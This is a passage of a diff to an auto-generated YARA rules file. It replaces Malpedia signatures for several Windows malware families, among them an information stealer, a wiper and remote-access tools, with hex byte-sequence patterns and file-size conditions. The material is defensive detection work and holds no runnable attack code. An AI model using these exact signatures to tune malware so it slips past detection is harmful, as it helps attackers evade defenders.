+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poortry"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.poortry_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "dae74c2bc008a70be0fd9b501245d9759dea529e108a1bf96ef7d1de1daf70f9"
+		logic_hash = "e3df0ea052d8930e4d05b0682bf4eefe707f0b5452f36cf3547bbe2d0167b185"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119829,32 +119880,32 @@ rule MALPEDIA_Win_Vhd_Ransomware_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f3ab 8b8530030000 8902 33c0 89a54cf3ffff 398530030000 7e1b }
-		$sequence_1 = { e8???????? 81c44c060000 80bd7ff6ffff00 7424 8bb574f6ffff 8d8dd0fcffff }
-		$sequence_2 = { 33d3 8b5df4 0fb69b98744100 0fb61c9d9b854100 33d3 8b5df8 }
-		$sequence_3 = { 785b 8d74ba04 8b4e04 33c0 33db 0306 13cb }
-		$sequence_4 = { 83c8ff 5d c3 6a08 68???????? e8???????? e8???????? }
-		$sequence_5 = { 33c0 b9c8000000 8d7a04 f3ab 8b8dd0fcffff 890a 85c9 }
-		$sequence_6 = { 8945cc bf40000000 b8???????? 8d75e0 895dc8 c745f40f000000 c745f000000000 }
-		$sequence_7 = { 8bd8 899d28b4ffff 83fbff 0f8430010000 8b4510 8b4d0c 50 }
-		$sequence_8 = { 398530030000 7e14 8d4a04 8bb48534030000 8931 40 83c104 }
-		$sequence_9 = { 03c2 13ce 33d2 52 8b95f4efffff 52 51 }
+		$sequence_0 = { 80c2d6 f6da 41d2db 80f283 4d63d8 4181e3cc593b0e 41c0c35a }
+		$sequence_1 = { 9c 418f00 450fbbf2 458b11 664585f0 66f7c16046 4181fd7b733a3c }
+		$sequence_2 = { 41d3d3 312c24 66450fabe3 410fbafb10 415b 3ac5 f9 }
+		$sequence_3 = { 0fbfdb 66440fb3fa 418ad6 410fb618 48d3ea 66d3c2 d2fe }
+		$sequence_4 = { 480fbfed f8 44311c24 400f9ec5 5d f8 4d63db }
+		$sequence_5 = { 4d0fb7e7 448ae7 415c 66450fbeea 66410fcd 490fbfed 415d }
+		$sequence_6 = { 0fca 41f6c185 56 311424 f8 5e 4863d2 }
+		$sequence_7 = { 66f7de 5e 4584c3 f9 4c3bc0 4d63d2 4d85eb }
+		$sequence_8 = { 488b11 40f6c6b8 498912 4863d7 411ad2 4881ef04000000 66c1daa9 }
+		$sequence_9 = { f5 55 4080e5d9 4881cda16c1a19 40d2d5 311424 66440fbbfd }
 
 	condition:
-		7 of them and filesize < 275456
+		7 of them and filesize < 8078336
 }
-rule MALPEDIA_Win_Darkmoon_Auto : FILE
+rule MALPEDIA_Win_Observer_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "39d28dd7-0564-597d-bdac-de621314fd7d"
+		id = "c0737640-3fea-5607-8cf7-00374c1f837c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmoon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.darkmoon_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.observer_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.observer_stealer_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "b873ed88e28a76ea623543146de01af6abe20197674c7ea051692aae659c4969"
+		logic_hash = "0be9a733455d3fbd7030daf285d74174d225df89f30a4020aa754c9c1ec43bc3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119868,32 +119919,32 @@ rule MALPEDIA_Win_Darkmoon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 898580f0ffff ff750c 680f0d0000 ffb580f0ffff 56 ff96d1000000 e8???????? }
-		$sequence_1 = { ff75f0 ff5675 83f800 766d 6a00 8d4df8 }
-		$sequence_2 = { 8d4f0c c645fc05 e8???????? 8d4f10 c645fc06 e8???????? }
-		$sequence_3 = { 68ff0f1f00 ff9695000000 83f800 74ac }
-		$sequence_4 = { 8d8656040000 50 6801000080 ff5635 8d8665010000 50 }
-		$sequence_5 = { 3b86b0080000 747c 8986b0080000 6804010000 8d85fcfdffff }
-		$sequence_6 = { 6a01 6a00 e8???????? 53 4f 46 }
-		$sequence_7 = { ff5621 8945f4 6a00 8d4df8 }
-		$sequence_8 = { ffb6e1000000 ff96dd000000 8945f4 6a00 ff75f8 ffb6ed000000 6a00 }
-		$sequence_9 = { 03d0 8b442410 03c2 89442410 8bc6 99 f7f9 }
+		$sequence_0 = { 59 57 8bc8 e8???????? 6a14 89442418 e8???????? }
+		$sequence_1 = { 8bcb e8???????? e9???????? 85ff 74cc 68???????? 8d4c2418 }
+		$sequence_2 = { c3 33c0 8bd1 53 56 57 8bfa }
+		$sequence_3 = { 59 59 c20400 56 8bf1 8b46e0 8b4004 }
+		$sequence_4 = { c3 83ec10 53 8bc1 55 }
+		$sequence_5 = { 55 e8???????? 3bc7 0f87ab000000 6bc024 50 89442414 }
+		$sequence_6 = { 8b751c 56 68???????? 57 e8???????? 8b4510 }
+		$sequence_7 = { 894d0c 894508 3d00100000 7215 8d4508 50 8d450c }
+		$sequence_8 = { 8d4dc0 68???????? e8???????? 837d3408 8d4d20 8d4508 0f434d20 }
+		$sequence_9 = { 89773c c7474001000000 c74750fb5d7708 e8???????? 8bc7 5f 5e }
 
 	condition:
-		7 of them and filesize < 98304
+		7 of them and filesize < 614400
 }
-rule MALPEDIA_Win_Misha_Auto : FILE
+rule MALPEDIA_Win_Dtrack_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7ba08020-4181-5ded-9bc0-49b98b3d2547"
+		id = "a8e0795f-f37a-570e-a2d0-586d485922bb"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.misha"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.misha_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dtrack"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dtrack_auto.yar#L1-L159"
 		license_url = "N/A"
-		logic_hash = "55176526d6c66aba41e971557ded1fe9cdb654b2ecbb0584caf24e3a0c3f703a"
+		logic_hash = "6b14b7e6495b7f7e349f91bcaae4aa222786469ac0195332831e5ef10b7a534f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119907,32 +119958,37 @@ rule MALPEDIA_Win_Misha_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0d19000200 50 8b4318 0508010000 50 }
-		$sequence_1 = { 6a08 59 8bc3 c1e310 0bc3 6a18 8bfa }
-		$sequence_2 = { ff75c8 8b4314 83c070 50 8b8578ffffff 48 48 }
-		$sequence_3 = { 50 8b4314 05d8000000 50 ff75ec 8b7308 }
-		$sequence_4 = { 50 8b4318 0508020000 50 ff730c e8???????? }
-		$sequence_5 = { 8945e8 8b4510 8b00 8945e4 8d45fc }
-		$sequence_6 = { c78550feffff18181818 c78554feffff18181818 c78558feffff18181819 c7855cfeffff19191919 c78560feffff19191919 c78564feffff19191919 c78568feffff19191919 }
-		$sequence_7 = { 6a00 e8???????? 83c40c 8b45f4 8a4d0c 884818 8b45f4 }
-		$sequence_8 = { 8d85f8f9ffff 50 8d85e0f9ffff e8???????? 83c40c 0fb6c0 }
-		$sequence_9 = { 8d8568ffffff 50 6a01 6a02 8b4314 83c008 50 }
+		$sequence_0 = { 52 8b4508 50 e8???????? 83c414 8b4d10 51 }
+		$sequence_1 = { 50 8d8dccfdffff 51 6a00 8d95b0faffff 52 }
+		$sequence_2 = { 8b4df8 c1e902 334df8 8b55f8 c1ea03 33ca }
+		$sequence_3 = { 33ca 8b55f8 c1ea07 33ca c1e118 }
+		$sequence_4 = { 50 e8???????? 83c40c c685b8fbffff00 }
+		$sequence_5 = { 8b88fc180000 8b5508 8b4508 8b8008100000 89848a04100000 8b4d0c }
+		$sequence_6 = { 8d959efaffff 52 e8???????? 83c410 8d85d4faffff 898528f6ffff }
+		$sequence_7 = { e8???????? 83c410 c68587f6ffff00 8b15???????? 52 }
+		$sequence_8 = { eb64 8b4d10 51 6a00 }
+		$sequence_9 = { 8b08 894dfc 8b550c 8b4204 8945f8 68efcdab89 }
+		$sequence_10 = { c1e217 0bca 894d14 8b45f8 }
+		$sequence_11 = { 6a00 8b55f4 52 e8???????? 83c40c 8b450c 8b08 }
+		$sequence_12 = { 0bc1 894518 8b5514 8955f8 }
+		$sequence_13 = { 8b4df8 c1e908 234df8 8b45f8 c1e810 23c8 }
+		$sequence_14 = { 8b4df0 3b4d10 0f8d90000000 8b5508 }
 
 	condition:
-		7 of them and filesize < 710656
+		7 of them and filesize < 1736704
 }
-rule MALPEDIA_Win_Unidentified_068_Auto : FILE
+rule MALPEDIA_Win_Chches_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "00ed8246-d247-5890-b70c-9dc2bd82550a"
+		id = "ef78cd53-b90a-5608-a384-2a896eb61dd5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_068"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_068_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chches"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.chches_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "fa30d57049b9c1bba68e7061433a03b7496f06c6df4edaee3b08ded2533d6885"
+		logic_hash = "b0a1cb7e042feb67b6afb2859125bb6309d891a3da8da2205204e42953893b2e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119946,32 +120002,32 @@ rule MALPEDIA_Win_Unidentified_068_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d3403 8bd6 c1fa06 8bce 83e13f 6bc930 8b049518c94500 }
-		$sequence_1 = { 51 ff5008 ffb56cffffff e8???????? 59 8d8d2cffffff e8???????? }
-		$sequence_2 = { 894dfc 57 8bd1 33ff 53 8d8dfcfeffff e8???????? }
-		$sequence_3 = { 897de8 8945d8 8b458c 2b8564ffffff 8945dc 6a08 e8???????? }
-		$sequence_4 = { 85c9 7904 33c0 5d c3 ff7510 }
-		$sequence_5 = { 0fafc1 3bf0 7314 8bf8 b800080000 2bc1 c1e805 }
-		$sequence_6 = { 83bf304b000002 744d 8b4d1c 85c9 7422 8b473c 2b4744 }
-		$sequence_7 = { e8???????? 6a10 83faff 8d4f28 58 0f45c2 }
-		$sequence_8 = { b800080000 2bc2 c1e805 03c2 66894312 6a02 eb14 }
-		$sequence_9 = { 6a2a 8d4dcc e8???????? 57 ff75cc 8d4dec e8???????? }
+		$sequence_0 = { e8???????? 8b4c243c 8903 8b4534 83c408 85c0 }
+		$sequence_1 = { ffd2 3dfe1f0000 7608 83eb64 e9???????? 8b7c2454 }
+		$sequence_2 = { 03c1 50 57 e8???????? 8b96d8000000 83c408 6860ea0000 }
+		$sequence_3 = { c7460800000000 8b4744 56 6a00 ffd0 8b4f50 50 }
+		$sequence_4 = { 897c2424 897c2430 3bc7 0f856c020000 8b5d0c 3bdf 0f8404030000 }
+		$sequence_5 = { 0f84aa010000 8b4660 8bd1 52 ffd0 8b5644 8bd8 }
+		$sequence_6 = { 8d791c 81c61d051101 85ff 746e 85db 744d 8b550c }
+		$sequence_7 = { 50 8b4364 ffd0 8b4df8 8b938c000000 6a00 6a00 }
+		$sequence_8 = { 33d2 6689140f 8b7c2410 eb1e 85c0 751a 8b03 }
+		$sequence_9 = { ffd2 50 8b4650 ffd0 8b4dfc 51 8d7df8 }
 
 	condition:
-		7 of them and filesize < 862208
+		7 of them and filesize < 122880
 }
-rule MALPEDIA_Win_Uacme_Auto : FILE
+rule MALPEDIA_Win_Pathwiper_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "53c60ae4-37ff-5d21-9239-76220be2dce4"
+		id = "a6716c11-1f14-5a04-8fe4-1682b0bebda9"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.uacme_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pathwiper"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pathwiper_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "3f55ec845579c619785e67b0034681c5b25544222a3c6be5c29fd4298627878a"
+		logic_hash = "2875d616150343a511e4ca1c06e26bab19bffb8a61f2efbef223956f6da2a004"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119985,32 +120041,32 @@ rule MALPEDIA_Win_Uacme_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d45e8 50 ff15???????? 2175f8 8d45f8 50 8d45f0 }
-		$sequence_1 = { 8d85ecfbffff 50 8d85ccf3ffff 50 }
-		$sequence_2 = { 50 8d45b4 50 68???????? ff15???????? 8bf0 }
-		$sequence_3 = { 8bcf c60000 40 83e901 75f7 8b1d???????? 394d10 }
-		$sequence_4 = { ff75f4 53 ff15???????? ff75fc 53 ff15???????? 6807700000 }
-		$sequence_5 = { 83ee01 75f7 68???????? 8d85c8fdffff 50 }
-		$sequence_6 = { 5d c3 ff7508 8bd3 8d8de0f7ffff e8???????? 59 }
-		$sequence_7 = { 8975dc 8975cc 85f6 7421 8b55e0 }
-		$sequence_8 = { 8906 5e 8b45fc 8be5 5d c3 55 }
-		$sequence_9 = { 3db7000000 0f8593010000 ba???????? 8d8ddcfbffff e8???????? 6a00 }
+		$sequence_0 = { c78540ffffff00000000 c78544ffffff0f000000 c68530ffffff00 8d8d88ebffff e8???????? 8bf8 6a00 }
+		$sequence_1 = { 84c0 0f84a8000000 807d3400 0f849e000000 8b950cfeffff 8b8d04feffff 8d4201 }
+		$sequence_2 = { 8845eb 8bc1 f7e6 6a00 68ffffff7f 52 50 }
+		$sequence_3 = { 8bf8 eb02 33ff 8b8518feffff 40 897dc0 50 }
+		$sequence_4 = { c645fc8a 50 8d8df3efffff e8???????? 8d85acf8ffff c645fc8b 50 }
+		$sequence_5 = { 3bf8 0f84f2010000 83c704 0f1f00 6a00 8d850cffffff 8bcf }
+		$sequence_6 = { e8???????? 83c408 83c718 3bbd48feffff 0f85c2feffff 8d8554feffff 898528feffff }
+		$sequence_7 = { 660fd68504f0ffff c785f4efffff3734d6f2 0f1f440000 8a443dd0 32c1 88843df8efffff }
+		$sequence_8 = { 2b85bcf6ffff 8985d8f6ffff 0f8559fcffff 8b8db8f6ffff 85c9 7445 8b3c8d7c2d4600 }
+		$sequence_9 = { 8b7508 8d45f4 683734daf3 50 8d45e0 8975ec 50 }
 
 	condition:
-		7 of them and filesize < 565248
+		7 of them and filesize < 1047552
 }
-rule MALPEDIA_Win_Ziyangrat_Auto : FILE
+rule MALPEDIA_Win_Rhttpctrl_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ad05acb3-2122-508e-96e1-44a0677aa226"
+		id = "0c1f067f-4c03-5217-84ef-e2056be8411e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ziyangrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ziyangrat_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhttpctrl"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rhttpctrl_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "89f077d6fe657db2420d0ceec203b172ff92ec6b640db30714a01b0a429a9ae6"
+		logic_hash = "e08ad966d09dce27a6d8e5d5ac2bacf3849e80bd61e38dcdd72f40d98e9b8f3d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120024,32 +120080,32 @@ rule MALPEDIA_Win_Ziyangrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c0 8dbc2421140000 889c2420140000 f3ab }
-		$sequence_1 = { 50 ff15???????? 85c0 751d ff15???????? 50 56 }
-		$sequence_2 = { 7560 55 6800040000 ff15???????? 55 8d842468010000 }
-		$sequence_3 = { 0f841b010000 81fe4c4f0000 0f87e6000000 8b4c2424 8d542414 83e110 }
-		$sequence_4 = { 33c0 8d7c2409 8bb4240c040000 f3ab 66ab 56 6a00 }
-		$sequence_5 = { 7e95 ffd5 8bf0 89742430 }
-		$sequence_6 = { 83f810 0f85a6000000 8b7304 81fe00500000 0f8f97000000 85f6 0f8c8f000000 }
-		$sequence_7 = { 33c0 8dbc2411010000 889c2410010000 f3ab 66ab aa b91f000000 }
-		$sequence_8 = { 8db424c0190000 f2ae f7d1 49 bf???????? 8bd1 c1e902 }
-		$sequence_9 = { 50 c68424fb00000061 c68424fc00000074 c68424fd00000061 889c24fe000000 c684240801000053 c684240901000079 }
+		$sequence_0 = { d1fe 6a55 ff34f5c0d54100 ff7508 e8???????? 83c40c 85c0 }
+		$sequence_1 = { ffd7 8b4c241c ff742410 8b35???????? 894114 ffd6 }
+		$sequence_2 = { 6a00 8d442418 50 8d4714 50 56 }
+		$sequence_3 = { 2bc3 39460c 0f8660ffffff 50 53 6aff ff7608 }
+		$sequence_4 = { 83c408 895f08 837f1400 c7471001000000 }
+		$sequence_5 = { 8b01 52 8d95f0d7ffff 52 ff5004 }
+		$sequence_6 = { 8d8424e4010000 6a00 50 e8???????? 83c40c c68424c001000000 }
+		$sequence_7 = { c705????????090400c0 c705????????01000000 c705????????01000000 6a04 58 6bc000 c780f43b420002000000 }
+		$sequence_8 = { 3bc1 7410 50 e8???????? 83c404 0f1085c0feffff 8b4508 }
+		$sequence_9 = { 8b7d0c 8bd9 85ff 7417 803e52 750c 807e0145 }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 339968
 }
-rule MALPEDIA_Win_Bh_A006_Auto : FILE
+rule MALPEDIA_Win_Ismagent_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f37d05fc-fa47-5fd7-bb26-823ae04185f6"
+		id = "67740cfb-8507-5206-9327-8d9ca8f2fd2f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bh_a006"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bh_a006_auto.yar#L1-L100"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ismagent_auto.yar#L1-L100"
 		license_url = "N/A"
-		logic_hash = "e3efc1dc1d935b6057dbf735dfbafda7bd291fd107bd55d1d22343cc85bf6fea"
+		logic_hash = "59fcd27aca5a3625483340bfe48980fca66506765ca3b82f7d01afb486f805fc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120063,32 +120119,32 @@ rule MALPEDIA_Win_Bh_A006_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bca 2b08 03cb 8930 }
-		$sequence_1 = { 6683bdecdfffff00 8dbdecdfffff 7436 57 }
-		$sequence_2 = { 88041a 42 884517 8955f4 e9???????? 2bf0 }
-		$sequence_3 = { 85ff 7472 8d45fc 50 }
-		$sequence_4 = { 8b95e4deffff 59 83e201 c1e202 6a04 59 }
-		$sequence_5 = { 8985d4ddffff 8985d8ddffff 8985dcddffff 8945fc }
-		$sequence_6 = { 898de4deffff 3bcb 7cbb 8bb5d8deffff 33db 8b85d0deffff 56 }
-		$sequence_7 = { 50 68???????? 8d85b8f5ffff 50 e8???????? 85c0 7922 }
+		$sequence_0 = { 68000000a0 ff7510 51 57 ffd0 68???????? }
+		$sequence_1 = { 50 56 57 8d942418170000 }
+		$sequence_2 = { 68e8030000 50 8d8424580b0000 50 e8???????? 83c40c 8d842418030000 }
+		$sequence_3 = { f3a4 8dbc24183e0000 4f 90 }
+		$sequence_4 = { 33c9 660f1f840000000000 8a81a00a4200 8d4901 88840c370f0000 84c0 }
+		$sequence_5 = { 66a5 8b7c2418 837c241400 742d 8bc8 8d5101 }
+		$sequence_6 = { c744243400000000 e8???????? 8b4c2428 8d442444 }
+		$sequence_7 = { 51 8b4c2434 8d942418070000 50 6a01 }
 
 	condition:
-		7 of them and filesize < 430080
+		7 of them and filesize < 327680
 }
-rule MALPEDIA_Win_Ghostsocks_Auto : FILE
+rule MALPEDIA_Win_Hookinjex_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ec83c1b8-972c-5302-8f5c-0348597b2510"
+		id = "e24b7d8d-57d5-5a71-8e95-7d0e69957252"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostsocks"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ghostsocks_auto.yar#L1-L151"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hookinjex"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hookinjex_auto.yar#L1-L153"
 		license_url = "N/A"
-		logic_hash = "86588affc1ba6a310125c5db73ff776fb8159fe6904364a27563bbbae0b566bf"
-		score = 75
-		quality = 75
+		logic_hash = "26e9369b12553b0bff21d81ce8a2563735cb73daf51c3e0b22c3fdadcf7df76a"
+		score = 60
+		quality = 25
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -120100,38 +120156,38 @@ rule MALPEDIA_Win_Ghostsocks_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f7e2 69df90010000 01da 89c3 }
-		$sequence_1 = { f7e2 7079 8d5504 89d5 }
-		$sequence_2 = { f7e2 0fafe9 8b4c2418 0fafcb }
-		$sequence_3 = { f7e2 707d 83f8ff 7772 8b542418 85d2 }
-		$sequence_4 = { f7e2 01d1 81e5ffffff3f 89ea c1fd1f 90 }
-		$sequence_5 = { f7e2 89442468 0fafde 01da }
-		$sequence_6 = { f7e2 83c6f8 90 90 83c308 }
-		$sequence_7 = { f7e2 89442428 01d1 05000096b3 }
-		$sequence_8 = { e8???????? 89856068fcff 89956468fcff 8d8d1bc3faff }
-		$sequence_9 = { e8???????? 89856071fcff 89956471fcff a1???????? }
-		$sequence_10 = { e8???????? 89856077feff 89956477feff 8b8d647ffeff }
-		$sequence_11 = { e8???????? 89856082fcff 89956482fcff 0fb685a77cffff }
-		$sequence_12 = { e8???????? 89856078fbff 89956478fbff 8b0d???????? }
-		$sequence_13 = { e8???????? 8985605ffdff 8995645ffdff 0fb6856fd5faff }
-		$sequence_14 = { e8???????? 89856076fcff 89956476fcff 8b85d0adfdff }
-		$sequence_15 = { e8???????? 89856074fbff 89956474fbff a1???????? }
+		$sequence_0 = { e8???????? b80a020000 eb02 33c0 }
+		$sequence_1 = { e8???????? 85c0 750f b9ab480100 }
+		$sequence_2 = { e8???????? b95b730100 e8???????? e9???????? }
+		$sequence_3 = { e8???????? 833d????????00 7411 b903000000 e8???????? 488905???????? }
+		$sequence_4 = { e8???????? 85c0 740f b907b60000 }
+		$sequence_5 = { e8???????? b964000000 ff15???????? 0fb705???????? }
+		$sequence_6 = { e8???????? 833d????????00 7411 b906000000 e8???????? 488905???????? }
+		$sequence_7 = { e8???????? 85c0 740c b913e40000 }
+		$sequence_8 = { 4883780800 7512 488b442450 8b00 }
+		$sequence_9 = { 0f843d010000 488b442440 488b4c2470 488b4920 }
+		$sequence_10 = { 25ff9fffff 89442420 8b442420 89442448 }
+		$sequence_11 = { 03442460 488b4c2468 8901 e9???????? 488b542470 488d4c2430 }
+		$sequence_12 = { 25ffe7ffff 0fbae80b 8944243c 8b44243c }
+		$sequence_13 = { 25ffe7ffff 0fbae80b 89442420 8b442420 89442468 }
+		$sequence_14 = { 25ff0f0000 89442448 488b0d???????? 48894c2450 }
+		$sequence_15 = { 25ffe7ffff 0fbae80b 8944245c 8b44245c }
 
 	condition:
-		7 of them and filesize < 25016320
+		7 of them and filesize < 6545408
 }
-rule MALPEDIA_Win_Ironhalo_Auto : FILE
+rule MALPEDIA_Win_Grillmark_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5d173d13-7e7f-5038-a17a-f1673b379630"
+		id = "94d64c09-2c69-5952-977d-9716f3cb3003"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironhalo"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ironhalo_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grillmark"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.grillmark_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "b28c071e016d2fd6c8035d945d059b7edc886edf229a30a1e4641350946cb806"
+		logic_hash = "c6ddc22f686e3bfc93b0245e1ab65f2459e27d4cb969cb323a24bb3baf4cbe5c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -120145,32 +120201,32 @@ rule MALPEDIA_Win_Ironhalo_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8a800c914000 83e00f eb02 33c0 }
-		$sequence_1 = { 8bcb c1f805 83e11f 8b048560e04000 f644c80401 0f84f9000000 6a01 }
-		$sequence_2 = { 6a00 56 e8???????? 56 e8???????? 8be8 83c410 }
-		$sequence_3 = { ffd6 8d542410 8d442424 52 50 ffd6 8d4c2424 }
-		$sequence_4 = { ffd7 8d742428 bb03000000 8d442438 }
-		$sequence_5 = { 243f c0e206 0ac2 83c104 88042f 45 803c3100 }
-		$sequence_6 = { 743a 0fb6d0 f68221cf400004 741a }
-		$sequence_7 = { 50 ffd7 8d742428 bb03000000 8d4c2438 8d542410 }
-		$sequence_8 = { 52 668954241c e8???????? 50 e8???????? 83c408 8d442410 }
-		$sequence_9 = { 6a00 6a50 50 56 ff15???????? 8be8 }
+		$sequence_0 = { ff15???????? 8d4df4 56 51 53 50 57 }
+		$sequence_1 = { 6800000080 ff7510 ff15???????? 8bf8 83ffff 7436 53 }
+		$sequence_2 = { f3ab 66ab aa 8d458c 895df8 50 895df4 }
+		$sequence_3 = { 83ffff 7504 33c0 eb1a }
+		$sequence_4 = { 66a5 a4 5f 33c0 3905???????? 5e 50 }
+		$sequence_5 = { 57 e8???????? 8d85f4fcffff 50 57 }
+		$sequence_6 = { ff15???????? 6a40 33c0 59 8dbdfdfeffff 889dfcfeffff 53 }
+		$sequence_7 = { 66ab aa 8d85fcfeffff 50 6804010000 e8???????? }
+		$sequence_8 = { 50 57 ffb604010000 56 e8???????? 83c410 85c0 }
+		$sequence_9 = { 6a01 ff7508 e8???????? 56 e8???????? ff75f4 }
 
 	condition:
-		7 of them and filesize < 131072
+		7 of them and filesize < 212992
 }
-rule MALPEDIA_Win_Bitsloth_Auto : FILE
+rule MALPEDIA_Win_Darktequila_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d21005cc-48c4-5c1b-8a1c-480f484a1c06"
+		id = "8b84bd16-ca3f-5431-937c-08f7f5b85ab2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsloth"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bitsloth_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktequila"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.darktequila_auto.yar#L1-L115"
